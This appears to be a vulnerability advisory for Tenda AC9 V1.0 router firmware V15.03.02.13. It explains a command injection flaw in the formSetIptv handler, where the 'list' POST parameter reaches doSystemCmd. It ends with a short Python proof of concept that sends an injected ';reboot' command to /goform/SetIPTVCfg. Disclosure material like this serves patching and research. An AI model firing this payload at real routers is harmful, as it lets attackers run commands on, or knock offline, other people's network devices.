Overview

• The device's official website: https://www.tenda.com.cn/material/show/102554
• Firmware download website: https://www.tenda.com.cn/material/show/102554

Affected version

AC9 V1.0 V15.03.02.13

Vulnerability details

The Tenda AC9 V1.0 V15.03.02.13 firmware has a command injection vulnerability in the formSetIptv function. The Var variable receives the list parameter from a POST request and is later passed to the sub_B0060 function.

In function sub_B0060, the variable a1 is directly assigned to system by doSystemCmd However, since the Since user can control the input of list, the statemeant doSystemCmd("nvram set adv.iptv.stballvlans=\\\\"%s\\\\"", a1); can cause a command injection.

POC

import requests

ip = "192.168.1.1"

url = f'http://{ip}/goform/SetIPTVCfg'
payload = '；reboot'

data = {"list": payload}

requests.post(url, data=data)